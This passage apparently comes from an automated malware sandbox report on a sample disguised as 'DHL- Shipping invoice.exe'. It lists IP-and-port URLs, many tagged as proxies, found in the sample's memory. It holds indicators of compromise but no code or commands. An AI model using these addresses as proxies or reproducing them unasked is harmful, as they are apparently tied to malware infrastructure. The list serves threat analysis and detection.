                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.177.28:8083://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.177.28:8083x
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.178.193:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.178.193:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E60000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.178.2:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.178.2:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.85.103.129:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.85.103.129:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.86.1.22:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.86.1.22:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.87.81.8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.87.81.86:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.87.81.86:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.88.90.70:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.88.90.70:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.90.227.244:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.90.227.244:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.95.97.43:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.95.97.43:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.96.38.161
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.96.38.161://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.96.38.161:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.99.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.99.27.3:8181
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.99.27.3:8181://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.128.103.32:64312
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.104.12
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.104.12://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.104.12:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.106
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.106://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.106:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.142
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.142://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.142:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.146
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.146://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.146:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.15
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.15://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.15:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.182
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.182://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.182:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.207:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.107.206://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.107.206:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.149
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.149://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983B5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.149:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.204
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.204://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.204:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.234
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.234://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.234:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.213
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.213://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.213:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.143.127:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.207.86
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.207.86://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.207.86:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.213.202://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.213.202:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.224.33:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.226.6
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.226.6://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.226.6:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.25.216
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.25.216://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.25.216:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9814A5000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.164.183.166:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9814A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.164.183.166:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.164.183.29:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.164.183.29:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.127
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.127.160:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.127.160:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.127.160:3128x
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.127.162:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.127.162:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.127.173:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.127.173:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.127.75:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.127.75:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.169
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.169.141:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.169.141:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.169.163:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.165.169.163:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981FAF000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.87.16:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.87.16:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.132.79
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.132.79://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.132.79:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.16.87:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.166.210
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.166.210://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.166.210:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.171.235
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.171.235://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.171.235:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.171.79:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.210.9
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.210.9://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.210.9:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.239.10
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.239.10://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.239.10:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.248.164
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.248.164://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.248.164:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.50.45
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.50.45://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.50.45:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.66.69
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.66.69://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.66.69:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.9.114
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.9.114://proxy8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.9.114:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.103.125
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.103.125://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.103.125:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.161.122://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.161.122:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.220.95
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.220.95://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.220.95:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.237.128:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.81.76
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.81.76://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.81.76:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.124.112
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.124.112://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.124.112:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.138.4
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.138.4://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.138.4:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.171.188
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.171.188://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.171.188:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.225.70://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.225.70:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.233.117
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.233.117://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.233.117:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.235.10
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.235.10://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.235.10:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.5.247
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.5.247://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.5.247:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.79.238
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.79.238://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.79.238:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.83.128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.83.128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.83.128:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.125.124:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.178.166
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.178.166://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.178.166:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.225.218
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.225.218://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.233.70
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.233.70://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.233.70:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.24.214
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9834B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.24.214://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9834B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.24.214:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.56.71
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.56.71://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.56.71:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.75.132
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.75.132://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.75.132:80
